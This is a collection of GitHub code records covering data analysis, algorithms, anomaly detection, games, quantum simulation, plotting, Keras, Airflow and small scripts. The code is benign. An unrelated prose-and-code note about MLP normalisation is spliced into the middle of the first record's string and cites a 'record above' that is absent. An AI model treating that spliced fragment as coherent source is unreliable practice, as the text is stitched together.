'Customer'].shape[0]\n#print(sub_count/rows_count)\n\nmen = df[df['gender']==1].shape[0]\nwomen = df[df['gender']==2].shape[0]\n#print(df['start station id'].nunique())\n#print(df['end station id'].nunique())\n\ndf['starttime'] = pd.to_datetime(df['starttime'])\ndf['stoptime'] = pd.to_datetime(df['stoptime'])\nage = df['birth year'].apply(lambda x: 2018 - x)\n#print(age.min())\n#print(df['end station name'].value_counts())\ndf = df.drop(['start station id', 'end station id'], axis=1)\ndf['age'] = age\ndf = df.drop('birth year', axis=1)\n\n\n#print(df[df['age']>60].shape[0])\n\ndf['trip duration'] = df['stoptime'] - df['starttime']\ndf['trip 
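A note on the curve-fitting record above: feeding raw values up to 1024 into a small MLP trained with SGD at lr=0.1 on MSELoss will typically overflow to NaN within a few steps. The usual fix is to normalise both tensors before fitting and invert the scaling on predictions; a sketch reusing the record's Fit_model (scale factors here are illustrative):

x_scale = x.max()
y_scale = y.max()
xn = x / x_scale                  # inputs in [0, 1]
yn = y / y_scale                  # targets in [0, 2] given y was doubled

model = Fit_model()
for _ in range(8000):
    loss = model.criterion(model(xn), yn)
    model.opt.zero_grad()
    loss.backward()
    model.opt.step()

y_pred = model(xn) * y_scale      # back to the original units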
duration'] = df['trip duration'].dt.seconds\n\n\n#print(df['trip duration'].mean())\ndf['weekend'] = df['starttime'].apply(lambda x: 1 if x.dayofweek > 4 else 0)\n\n\nprint(df[df['weekend']==1].shape[0])\n\ndef time_of_day(date):\n if date.hour < 7:\n return 'night'\n elif date.hour < 13:\n return 'morning'\n elif date.hour < 19:\n return 'day'\n else:\n return 'evening'\n \ndf['time of day'] = df['starttime'].apply(time_of_day) \n\nprint(df.info())\nprint(df.head(5)) \n\nnight = df[df['time of day']=='night'].shape[0]\nday = df[df['time of day']== 'day'].shape[0]\nprint(day/night)","repo_name":"legiov/ml","sub_path":"project1/test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"349508268","text":"# -*- coding: utf-8 -*-\n\"\"\"\n File Name: 322. Coin Change\n Description :\n Author : simon\n date: 19-3-28\n\"\"\"\n\n\nclass Solution(object):\n def coinChange(self, coins, amount):\n \"\"\"\n :type coins: List[int]\n :type amount: int\n :rtype: int\n \"\"\"\n coins = [x for x in coins if x <= amount]\n\n if not coins or not len(coins):\n if amount: return -1\n return 0\n\n dp = [amount + 1] * (amount + 1) # 使用0个硬币 实现[0,...,amount] 这么多种target sum\n dp[0] = 0 # 使用0个硬币实现target sum 0\n\n for tar in range(min(coins), amount + 1):\n for coin in coins:\n dp[tar] = min(dp[tar], dp[tar - coin] + 1)\n\n return -1 if dp[-1] == amount + 1 else dp[-1]\n\n\"\"\"\n修改版\ndp函数 输入:target 输出:需要的硬币数\n\"\"\"\n\n\nclass Solution(object):\n def coinChange(self, coins, amount):\n \"\"\"\n :type coins: List[int]\n :type amount: int\n :rtype: int\n \"\"\"\n dp = [amount + 1] * (amount + 1) #实现[0,...,amount] 这么多种target sum 需要的硬币数\n dp[0] = 0 # 实现target sum 0 需要0个硬币\n for tar in range(1, amount + 1):\n for coin in coins:\n if coin <= tar:\n dp[tar] = min(dp[tar], dp[tar - coin] + 1)\n return -1 if dp[-1] == amount + 1 else dp[-1]\n","repo_name":"Simon717/sword-to-offer-python","sub_path":"leetcode/322. Coin Change.py","file_name":"322. 
Coin Change.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"32785697737","text":"import json\nimport logging\nimport time\nimport torch\nimport numpy as np\n\nfrom torch.utils.data import DataLoader\nfrom sklearn.ensemble import IsolationForest\nfrom sklearn.metrics import roc_auc_score\nfrom base.base_dataset import BaseADDataset\nfrom networks.main import build_autoencoder\n\n\nclass IsoForest(object):\n \"\"\"A class for Isolation Forest models.\"\"\"\n\n def __init__(self, hybrid=False, n_estimators=100, max_samples='auto', contamination=0.1, n_jobs=-1, seed=None,\n **kwargs):\n \"\"\"Init Isolation Forest instance.\"\"\"\n self.n_estimators = n_estimators\n self.max_samples = max_samples\n self.contamination = contamination\n self.n_jobs = n_jobs\n self.seed = seed\n\n self.model = IsolationForest(n_estimators=n_estimators, max_samples=max_samples, contamination=contamination,\n n_jobs=n_jobs, random_state=seed, **kwargs)\n\n self.hybrid = hybrid\n self.ae_net = None # autoencoder network for the case of a hybrid model\n\n self.results = {\n 'train_time': None,\n 'test_time': None,\n 'test_auc': None,\n 'test_scores': None\n }\n\n def train(self, dataset: BaseADDataset, device: str = 'cpu', n_jobs_dataloader: int = 0):\n \"\"\"Trains the Isolation Forest model on the training data.\"\"\"\n logger = logging.getLogger()\n\n # do not drop last batch for non-SGD optimization shallow_ssad\n train_loader = DataLoader(dataset=dataset.train_set, batch_size=128, shuffle=True,\n num_workers=n_jobs_dataloader, drop_last=False)\n\n # Get data from loader\n X = ()\n for data in train_loader:\n inputs, _, _, _ = data\n inputs = inputs.to(device)\n if self.hybrid:\n inputs = self.ae_net.encoder(inputs) # in hybrid approach, take code representation of AE as features\n X_batch = inputs.view(inputs.size(0), -1) # X_batch.shape = (batch_size, n_channels * height * width)\n X += (X_batch.cpu().data.numpy(),)\n X = np.concatenate(X)\n\n # Training\n logger.info('Starting training...')\n start_time = time.time()\n self.model.fit(X)\n train_time = time.time() - start_time\n self.results['train_time'] = train_time\n\n logger.info('Training Time: {:.3f}s'.format(self.results['train_time']))\n logger.info('Finished training.')\n\n def test(self, dataset: BaseADDataset, device: str = 'cpu', n_jobs_dataloader: int = 0):\n \"\"\"Tests the Isolation Forest model on the test data.\"\"\"\n logger = logging.getLogger()\n\n _, test_loader = dataset.loaders(batch_size=128, num_workers=n_jobs_dataloader)\n\n # Get data from loader\n idx_label_score = []\n X = ()\n idxs = []\n labels = []\n for data in test_loader:\n inputs, label_batch, _, idx = data\n inputs, label_batch, idx = inputs.to(device), label_batch.to(device), idx.to(device)\n if self.hybrid:\n inputs = self.ae_net.encoder(inputs) # in hybrid approach, take code representation of AE as features\n X_batch = inputs.view(inputs.size(0), -1) # X_batch.shape = (batch_size, n_channels * height * width)\n X += (X_batch.cpu().data.numpy(),)\n idxs += idx.cpu().data.numpy().astype(np.int64).tolist()\n labels += label_batch.cpu().data.numpy().astype(np.int64).tolist()\n X = np.concatenate(X)\n\n # Testing\n logger.info('Starting testing...')\n start_time = time.time()\n scores = (-1.0) * self.model.decision_function(X)\n self.results['test_time'] = time.time() - start_time\n scores = scores.flatten()\n\n # Save triples of (idx, label, score) in a list\n 
idx_label_score += list(zip(idxs, labels, scores.tolist()))\n self.results['test_scores'] = idx_label_score\n\n # Compute AUC\n _, labels, scores = zip(*idx_label_score)\n labels = np.array(labels)\n scores = np.array(scores)\n self.results['test_auc'] = roc_auc_score(labels, scores)\n\n # Log results\n logger.info('Test AUC: {:.2f}%'.format(100. * self.results['test_auc']))\n logger.info('Test Time: {:.3f}s'.format(self.results['test_time']))\n logger.info('Finished testing.')\n\n def load_ae(self, dataset_name, model_path):\n \"\"\"Load pretrained autoencoder from model_path for feature extraction in a hybrid Isolation Forest model.\"\"\"\n\n model_dict = torch.load(model_path, map_location='cpu')\n ae_net_dict = model_dict['ae_net_dict']\n if dataset_name in ['mnist', 'fmnist', 'cifar10']:\n net_name = dataset_name + '_LeNet'\n else:\n net_name = dataset_name + '_mlp'\n\n if self.ae_net is None:\n self.ae_net = build_autoencoder(net_name)\n\n # update keys (since there was a change in network definition)\n ae_keys = list(self.ae_net.state_dict().keys())\n for i in range(len(ae_net_dict)):\n k, v = ae_net_dict.popitem(False)\n new_key = ae_keys[i]\n ae_net_dict[new_key] = v\n i += 1\n\n self.ae_net.load_state_dict(ae_net_dict)\n self.ae_net.eval()\n\n def save_model(self, export_path):\n \"\"\"Save Isolation Forest model to export_path.\"\"\"\n pass\n\n def load_model(self, import_path, device: str = 'cpu'):\n \"\"\"Load Isolation Forest model from import_path.\"\"\"\n pass\n\n def save_results(self, export_json):\n \"\"\"Save results dict to a JSON-file.\"\"\"\n with open(export_json, 'w') as fp:\n json.dump(self.results, fp)\n","repo_name":"Minqi824/ADBench","sub_path":"adbench/baseline/DeepSAD/src/baselines/isoforest.py","file_name":"isoforest.py","file_ext":"py","file_size_in_byte":5732,"program_lang":"python","lang":"en","doc_type":"code","stars":687,"dataset":"github-code","pt":"75"} +{"seq_id":"74035630642","text":"import pygame\nfrom pygame.locals import *\n\n# Initialize pygame\npygame.init()\n\n# Constants\nSCREEN_WIDTH = 2000\nSCREEN_HEIGHT = 1000\nFARMER_SIZE = 16\nFARMER_SPEED = 5\nFPS = 60\n\n# Colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\nclass Farmer:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.sprite_sheet = pygame.image.load('pics/P1.png')\n \n # Assuming your sprite frames are 16x16 as before\n self.walk_frames = [\n self.get_image(0, 0, 32, 32),\n self.get_image(32, 0, 32, 32)\n ]\n \n self.current_frame = 0\n self.image = self.walk_frames[self.current_frame]\n self.walking = False\n\n def get_image(self, x, y, width, height):\n \"\"\"Extract a specific image from a sprite sheet.\"\"\"\n image = pygame.Surface([width, height])\n image.blit(self.sprite_sheet, (0, 0), (x, y, width, height))\n return image\n\n def move(self, keys_pressed):\n self.walking = False\n if keys_pressed[K_w] or keys_pressed[K_UP]:\n self.y -= FARMER_SPEED\n self.walking = True\n if keys_pressed[K_s] or keys_pressed[K_DOWN]:\n self.y += FARMER_SPEED\n self.walking = True\n if keys_pressed[K_a] or keys_pressed[K_LEFT]:\n self.x -= FARMER_SPEED\n self.walking = True\n if keys_pressed[K_d] or keys_pressed[K_RIGHT]:\n self.x += FARMER_SPEED\n self.walking = True\n\n if self.walking:\n self.current_frame = (self.current_frame + 1) % len(self.walk_frames)\n self.image = self.walk_frames[self.current_frame]\n\n # Keep the farmer within the screen\n self.x = max(0, min(SCREEN_WIDTH - FARMER_SIZE, self.x))\n self.y = max(0, min(SCREEN_HEIGHT - FARMER_SIZE, self.y))\n\n def 
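The `IsoForest` wrapper above negates `decision_function`, since scikit-learn returns higher values for inliers. A minimal standalone sketch of that sign convention, on synthetic data:

```python
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.RandomState(0)
X_train = rng.randn(200, 2)                          # inliers around the origin
X_test = np.vstack([rng.randn(5, 2), [[6.0, 6.0]]])  # last row is an outlier

model = IsolationForest(n_estimators=100, random_state=0).fit(X_train)
scores = -model.decision_function(X_test)  # flip: higher = more anomalous
print(scores.argmax())                     # 5, the obvious outlier
```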
draw(self, screen):\n screen.blit(self.image, (self.x, self.y))\n\n\ndef main():\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n pygame.display.set_caption(\"Farmer Defense\")\n clock = pygame.time.Clock()\n\n # Initialize farmer in the middle of the screen\n farmer = Farmer(SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2)\n \n running = True\n while running:\n keys_pressed = pygame.key.get_pressed()\n\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n\n farmer.move(keys_pressed)\n\n # Draw everything\n screen.fill(WHITE)\n farmer.draw(screen)\n\n pygame.display.flip()\n clock.tick(FPS)\n\n pygame.quit()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Xinsssss/weird_mini_game","sub_path":"the_game.py","file_name":"the_game.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28059082516","text":"from QuantumComputerSimulator.mods.MatrixFrame import MatrixFrame\nfrom QuantumComputerSimulator.mods.DenseMatrix import DenseMatrix\n\n\nimport copy\nimport numpy as np\n\nclass LazyMatrix(MatrixFrame):\n\n def __init__(self, Type, *args):\n '''\n Implements the Lazy method for quantum computing simulation.\n\n Type Gate to be built.
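`Farmer.get_image` crops frames out of a sprite sheet by blitting a sub-rectangle onto a fresh surface. A self-contained sketch of the same idea ('sheet.png' is a placeholder file name):

```python
import pygame

pygame.init()
screen = pygame.display.set_mode((320, 240))   # display needed before convert()
sheet = pygame.image.load('sheet.png').convert()

def crop(sheet, x, y, w, h):
    frame = pygame.Surface((w, h))
    frame.blit(sheet, (0, 0), (x, y, w, h))    # copy the (x, y, w, h) region
    return frame

# Two 32x32 walk frames laid out side by side, as in the Farmer class.
frames = [crop(sheet, i * 32, 0, 32, 32) for i in range(2)]
```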
\n *args Position of control and target qubits.\n '''\n if Type == 'I':\n self.matrix = [lambda x: x[0], lambda x: x[1]]\n if Type == 'H':\n self.matrix = [lambda x: (x[0] + x[1]) / np.sqrt(2), lambda x: (x[0] - x[1]) / np.sqrt(2)]\n if Type == 'P':\n self.matrix = [lambda x: x[0], lambda x: np.exp(1j * args[0]) * x[1]]\n\n if Type == 'X':\n self.matrix = [lambda x: x[1], lambda x: x[0]]\n if Type == 'Y':\n self.matrix = [lambda x: 1j * x[1], lambda x: -1j * x[0]]\n if Type == 'Z':\n self.matrix = [lambda x: x[0], lambda x: -1 * x[1]]\n\n if Type == 'TP' or Type == 'MM' or Type == \"General\":\n self.matrix = args[0]\n\n if Type == 'CNOT':\n self.matrix = self.cnot(args[0], args[1], args[2])\n if Type == 'CV':\n self.matrix = self.cv(args[0], args[1], args[2])\n if Type == 'CZ':\n self.matrix = self.cz(args[0], args[1], args[2])\n\n if Type == 'M0':\n self.matrix = [lambda x: x[0], lambda x: 0]\n if Type == 'M1':\n self.matrix = [lambda x: 0, lambda x: x[1]]\n\n if Type == 'zerocol':\n self.matrix = []\n if Type == 'onecol':\n self.matrix = []\n\n self.dim = len(self.matrix)\n\n @classmethod\n def quantum_register(cls, qnum):\n '''Initialises register.'''\n reg = []\n for i in range(0,qnum):\n reg.append([lambda x: x[i]])\n return LazyMatrix('General',reg)\n\n @classmethod\n def tensor_prod(cls, m2, m1):\n '''\n Tensor product.\n '''\n tp = []\n for i in range(0, m1.dim):\n for j in range(0, m2.dim):\n tp.append(lambda x, y=i, z=j: m1.matrix[y](\n [m2.matrix[z]([x[m2.dim * k + l] for l in range(0, m2.dim)]) for k in range(0, m1.dim)]))\n\n new_matrix = LazyMatrix('TP', tp)\n return new_matrix\n\n @classmethod\n def matrix_multiply(cls, m1, m2):\n mm = []\n for i in range(0, m1.dim):\n mm.append(\n lambda x, y=i: m1.matrix[y]([m2.matrix[k]([x[l] for l in range(0, m2.dim)]) for k in range(0, m1.dim)]))\n\n new_matrix = LazyMatrix('MM', mm)\n return new_matrix\n\n @classmethod\n def inner_product(cls, M):\n return DenseMatrix.inner_product(M)\n\n @classmethod\n def trace(cls, M):\n return DenseMatrix.trace(M)\n\n def cnot(self, d, c, t):\n '''CNot gate'''\n digits = copy.deepcopy(d)\n cn = []\n\n index = super().CNOT_logic(digits, c, t)\n\n for i in range(0, len(index)):\n cn.append(lambda x, y=i: x[index[y]])\n\n return cn\n\n def cv(self, d, c, t):\n '''CV gate'''\n digits = copy.deepcopy(d)\n cv = []\n\n index = super().CV_logic(digits, c, t)\n\n for i in range(0, len(digits)):\n if index[i] == 1:\n cv.append(lambda x, y=i: 1j * x[y])\n else:\n cv.append(lambda x, y=i: x[y])\n\n return cv\n\n def cz(self, d, c, t):\n '''CZ gate'''\n digits = copy.deepcopy(d)\n cz = []\n\n index = super().CZ_logic(digits,c,t)\n\n for i in range(0,len(digits)):\n if index[i] == 1:\n cz.append(lambda x,y=i: -1*x[y])\n else:\n cz.append(lambda x,y=i: x[y])\n\n return cz\n\n def output(self,inputs):\n '''\n Gives the output state once the register, given by `inputs`, is applied.\n '''\n new_in = []\n for i in range(0,len(inputs)):\n new_in.append(inputs[i])\n out = []\n for i in range(0,self.dim):\n out.append(self.matrix[i](new_in))\n\n #To Vector form:\n out = np.array(out)\n out.shape = (len(out),1)\n return out","repo_name":"emmaghl/QCP_7","sub_path":"QuantumComputerSimulator/mods/LazyMatrix.py","file_name":"LazyMatrix.py","file_ext":"py","file_size_in_byte":4235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33569044644","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Marta\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport 
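The "lazy" representation above stores a gate as one closure per output amplitude instead of a matrix. A toy illustration using the Hadamard entry from the constructor:

```python
import numpy as np

# One lambda per row of the 2x2 Hadamard, exactly as in LazyMatrix.
H = [lambda x: (x[0] + x[1]) / np.sqrt(2),
     lambda x: (x[0] - x[1]) / np.sqrt(2)]

state = [1.0, 0.0]                 # amplitudes of |0>
out = [row(state) for row in H]    # evaluate lazily; no matrix is ever built
print(out)                         # [0.7071..., 0.7071...]
```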
matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\n#import default figure format for the book\nplt.style.use(['seaborn-ticks','../pv-textbook.mplstyle'])\n\n#import default color scheme for the book\nimport yaml\nwith open('../colors.yaml') as file:\n colors = yaml.load(file, Loader=yaml.FullLoader)\n\nstatic=pd.read_csv('data/Timeseries_37.779_-122.420_NS_1kWp_crystSi_14_36deg_11deg_2015_2015.csv', \n skiprows=range(0,10), sep=',')\nstatic_max =max([float(x) for x in static['P'][0:8760]])\nstatic_s = sorted([float(x)/static_max for x in static['P'][0:8760]], reverse=True)\n\ntracking=pd.read_csv('data/Timeseries_37.779_-122.420_NS_1kWp_crystSi_14_i0deg_2015_2015.csv', \n skiprows=range(0,10), sep=',')\ntracking_max =max([float(x) for x in tracking['P'][0:8760]])\ntracking_s = sorted([float(x)/tracking_max for x in static['P'][0:8760]], reverse=True)\n\nplt.figure(figsize=(18, 8))\ngs1 = gridspec.GridSpec(1, 2)\ngs1.update(wspace=0.2, hspace=0.2)\ncolor_1=colors['color5']\n\nax0 = plt.subplot(gs1[0,0])\nax0.set_ylabel('Normalized DC PV generation', fontsize=22)\n\nax0.plot(static_s, color=colors['color4'], linewidth=3,\n linestyle='--', label='fixed structure')\nax0.plot(tracking_s, color=colors['color5'], linewidth=3,\n label='HSAT')\nax0.set_xlim(0,8760)\nax0.set_ylim(0,1.05)\nax0.set_xlabel('hours throughout the year', fontsize=22,)\n# ax0.fill_between(np.arange(0,1000),np.array(tracking_s[0:1000]), \n# 0.8*np.ones(1000), color=colors['color5'], alpha=0.3)\n\nax0.fill_between(np.arange(0,900),np.array(static_s[0:900]), \n 0.8*np.ones(900), color=colors['color4'], alpha=0.6)\n\n\nax0.annotate('curtailed energy', xy=(300, 0.85), xytext=(1000, 0.9), fontsize=22,\n arrowprops=dict(facecolor='black', arrowstyle='->'))\n\nax0.annotate('inverter AC capacity', xy=(1000, 0.8), xytext=(2000, 0.8), fontsize=22,\n arrowprops=dict(facecolor='black', arrowstyle='->'))\nax0.legend(fancybox=False, fontsize=22, loc='lower right', \n facecolor='white', ncol=1, frameon=True)\n\nax1 = plt.subplot(gs1[0,1])\nyears=np.arange(2010,2022)\nstatic = [ 1.19, 1.2, 1.21, 1.21, 1.24, 1.24, 1.23, 1.23, 1.24, 1.23, 1.22, 1.28 ]\n#1-axis horizontal tracking\ntracking = [1.19, 1.22, 1.23, 1.24, 1.27, 1.26, 1.27, 1.26, 1.25, 1.25, 1.23, 1.26]\n\n\nax1.set_ylabel('DC to AC ratio (global average)', fontsize=22)\nax1.plot(years, static, color=colors['color4'], linewidth=3,\n linestyle='--', label='fixed structure',\n marker='o', markerfacecolor='white',markersize=12)\nax1.plot(years, tracking, color=colors['color5'], linewidth=3,\n label='HSAT',\n marker='o', markerfacecolor='white',markersize=12)\n\nax1.set_xlim(2009,2022)\nax1.set_ylim(1.18,1.30)\nax1.set_xticks(years)\nax1.set_xticklabels(years, rotation=45)\nax1.yaxis.grid('--')\n\nax1.legend(fancybox=False, fontsize=22, loc='best', \n facecolor='white', ncol=1, frameon=True)\nplt.savefig('figures/DC_AC_ratio.jpg', dpi=300, bbox_inches='tight') ","repo_name":"martavp/pv-textbook","sub_path":"Figures/Chapter_13/DC_AC_ratio.py","file_name":"DC_AC_ratio.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"41373832080","text":"import numpy as np\n\nfrom skimage.transform import resize\n\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras.layers import BatchNormalization\nfrom keras.layers import Input, concatenate, Conv2D, MaxPooling2D, Conv2DTranspose\n\nfrom designs.components.loss_functions import dice_coef_loss\nfrom 
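The left panel of the figure above is a duration curve: hourly output sorted in descending order and normalised by the peak, with curtailment read off above the inverter's AC cap. A compact sketch of that construction on synthetic data (the script itself uses PVGIS time series):

```python
import numpy as np

hourly = np.clip(np.sin(np.linspace(0, 300, 8760)) + 0.2, 0, None)  # fake PV
curve = np.sort(hourly)[::-1] / hourly.max()  # descending, peak-normalised

ac_cap = 0.8                                        # inverter AC limit
curtailed = np.clip(curve - ac_cap, 0, None).sum()  # energy above the cap
```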
designs.components.loss_functions import dice_coef\n\n\n# CITATION\n# - U-Net: https://arxiv.org/pdf/1505.04597.pdf\n# Note: they use 20 input layers.\n\n\n# resize input matrix\nresize_image_height_to = 128\nresize_image_width_to = 128\n\n\n# MODEL\ndef build():\n print(\"NO MAX POOL\")\n print('using model: straight up convolution, ditched the maxpooling') \n\n # expected input shape\n inputs = Input((resize_image_height_to, resize_image_width_to, 1)) # 1 channel, x rows, y = x columns\n\n conv1 = Conv2D(64, (3, 3), activation='relu', padding='same')(inputs) # -> convolution to features: 32 window: 3\n conv2 = Conv2D(64, (3, 3), activation='relu', padding='same')(conv1) # -> convolution to features: 32 window: 9\n conv3 = Conv2D(128, (5, 5), activation='relu', padding='same')(conv2) # -> convolution to features: 64 window: 18\n conv4 = Conv2D(128, (5, 5), activation='relu', padding='same')(conv3) # -> convolution to features: 64 window: 18\n conv5 = Conv2D(128, (5, 5), activation='relu', padding='same')(conv4) # -> convolution to features: 128 window: 54 \n conv6 = Conv2D(264, (5,5), activation='relu', padding='same')(conv5) # -> convolution to features: 128 window: 162\n conv7 = Conv2D(264, (5,5), activation='relu', padding='same')(conv6) # -> convolution to features: 256 window: 486\n conv8 = Conv2D(128, (5,5), activation='relu', padding='same')(conv7) # -> convolution to features: 256 window: 1458\n conv9 = Conv2D(128, (5,5), activation='relu', padding='same')(conv8) # -> convolution to features: 256 window: 1458\n cake0 = concatenate([conv1,\n conv2,\n conv3,\n conv4,\n conv5,\n conv6,\n conv7,\n conv8,\n conv9], axis=-1)\n\n conv10 = Conv2D(1, (1, 1), activation='sigmoid')(cake0)\n\n model = Model(inputs=[inputs], outputs=[conv10])\n model.compile(optimizer=Adam(lr=1e-3), loss=dice_coef_loss, metrics=[dice_coef])\n\n return model\n\n\n\n","repo_name":"mabafaba/ShelterSegmentation","sub_path":"designs/nomaxpool.py","file_name":"nomaxpool.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"38652956344","text":"import datetime as dt\n\nfrom airflow import DAG\nfrom airflow.decorators import dag, task\nfrom airflow.operators.bash import BashOperator\n\n\nargs = {\n \"owner\": \"jrstats\",\n \"retries\": 5,\n \"retry_delay\": dt.timedelta(minutes=2)\n}\n\n\n\n\n@dag(\n dag_id=\"cron\",\n description=\"cron\",\n start_date=dt.datetime(2022,12,19), # catchup=True airflow will automatically run the flow once for each day missed\n schedule_interval=\"0 3 * * TUE,FRI\",\n default_args=args,\n catchup=True\n)\ndef taskflow_dag():\n \n b0 = BashOperator(\n task_id=\"bash0\",\n bash_command=\"echo hello world\"\n )\n\ntaskflow_dag()\n","repo_name":"jrstats/airflow-training","sub_path":"dags/5_cron.py","file_name":"5_cron.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17488041570","text":"import re\nimport subprocess as sp\n\ndef lmake(*args,rc=0,summary={},**kwds) :\n\n\tkwds.setdefault('start',...)\n\n\ttry :\n\n\t\tcmd = ('lmake',*args)\n\t\tprint()\n\t\tprint( '+ ' + ' '.join(cmd) )\n\t\tproc = sp.run( cmd , universal_newlines=True , stdin=None , stdout=sp.PIPE )\n\t\tprint(proc.stdout,end='',flush=True)\n\t\tif proc.returncode!=rc : raise RuntimeError(f'bad return code {proc.returncode} != {rc}')\n\t\tsp.run( ('ldump',) , universal_newlines=True , stdin=None , stdout=sp.PIPE , check=True 
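The model compiles with `dice_coef_loss` from a project module that is not shown here. A common Keras-backend definition it plausibly matches (an assumption; the project's actual code may differ):

```python
from keras import backend as K

def dice_coef(y_true, y_pred, smooth=1.0):
    # Overlap-based similarity in [0, 1]; smooth avoids division by zero.
    y_true_f = K.flatten(y_true)
    y_pred_f = K.flatten(y_pred)
    intersection = K.sum(y_true_f * y_pred_f)
    return (2.0 * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)

def dice_coef_loss(y_true, y_pred):
    return -dice_coef(y_true, y_pred)
```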
)\n\n\t\tcnt = { k:0 for k in kwds }\n\t\tsum_cnt = { k:0 for k in summary }\n\t\tseen_summary = False\n\t\tfor l in proc.stdout.splitlines() :\n\t\t\tif l=='| SUMMARY |' : seen_summary = True\n\t\t\tif seen_summary :\n\t\t\t\tfor k in summary :\n\t\t\t\t\tm = re.fullmatch(k,l)\n\t\t\t\t\tif m : sum_cnt[k] += 1\n\t\t\telse :\n\t\t\t\tm = re.fullmatch(r'(?P<key>\\w+) .*',l)\n\t\t\t\tif m :\n\t\t\t\t\tk = m.group('key')\n\t\t\t\t\tif k not in cnt : raise RuntimeError(f'unexpected key {k}')\n\t\t\t\t\tcnt[k] += 1\n\t\tfor k,v in list(kwds.items()) :\n\t\t\tif v==... :\n\t\t\t\tdel cnt [k]\n\t\t\t\tdel kwds[k]\n\t\tif cnt!=kwds :\n\t\t\tfor k in cnt :\n\t\t\t\tif cnt[k]!=kwds[k] : raise RuntimeError(f'bad count for {k} : {cnt[k]} != {kwds[k]}')\n\t\tif sum_cnt!=summary :\n\t\t\tfor k in sum_cnt :\n\t\t\t\tif sum_cnt[k]!=summary[k] : raise RuntimeError(f'bad count for summary {k} : {sum_cnt[k]} != {summary[k]}')\n\n\texcept RuntimeError as e :\n\t\tprint('*** '+e.args[0])\n\t\traise\n","repo_name":"cesar-douady/open-lmake","sub_path":"_lib/ut.py","file_name":"ut.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"40863689804","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 11 16:40:58 2022\r\n\r\n@author: R.U.S.T.E.A.M\r\n\"\"\"\r\n\r\ndef add_binary(a,b):\r\n    a = a + b\r\n    b = ''\r\n    while a > 0:\r\n        b += str(a%2)\r\n        a //=2\r\n    if b[::-1]:\r\n        return b[::-1]\r\n    else:\r\n        return '0'","repo_name":"rustamabdukakhorov/CodeWars_Solutions","sub_path":"7_kyu_Binary Addition.py","file_name":"7_kyu_Binary Addition.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"69853453683","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAssorted utility functions.\n\"\"\"\n# Written by Johannes Langøy, 2014. Public domain.\n\ndef flatten(lst):\n    out = []\n    for i in lst:\n        if isinstance(i, list):\n            out.extend(flatten(i))\n        else:\n            out.append(i)\n    return out\n\ndef exert(elms, lst, pos):\n    for i in elms:\n        lst.insert(pos, i)\n        pos += 1\n","repo_name":"Jovlang/python","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40920529350","text":"print('Campanha de Vacinação - PuppyBel!')\n\npets_vacinados = 0\ncontinuar = 's'\n\nwhile continuar == 's':\n    especie = input('Qual a espécie do seu pet? ').lower().strip()\n    if especie in [\"cachorro\", \"cao\", \"canis\", \"gato\", \"felino\"]:\n        nome = input(f'Qual o nome do seu {especie}? ').title().strip()\n        pets_vacinados += 1\n        print(f'Espécie: {especie}, Nome: {nome}, Número: {pets_vacinados}')\n\n        for i in range(1, 4):\n            print(f'Vacina <{i}> - OK.')\n\n        print(f'{nome} foi vacinado(a) com sucesso!')\n    else:\n        print(f\"Desculpe, a campanha de vacinação não atende {especie}.\")\n\n    opcao = input(\"Há mais animais na fila para vacinar? 
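A hypothetical call of the `lmake` helper above from a unit test: run `lmake hello.out`, expect the default return code 0, and require exactly one stdout line starting with each listed keyword. The target name and the `done`/`new` keys are illustrative assumptions, not taken from the repository.

```python
import ut

# Each keyword argument is an expected count of output lines whose first
# word is that key; rc defaults to 0.
ut.lmake('hello.out', done=1, new=1)
```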
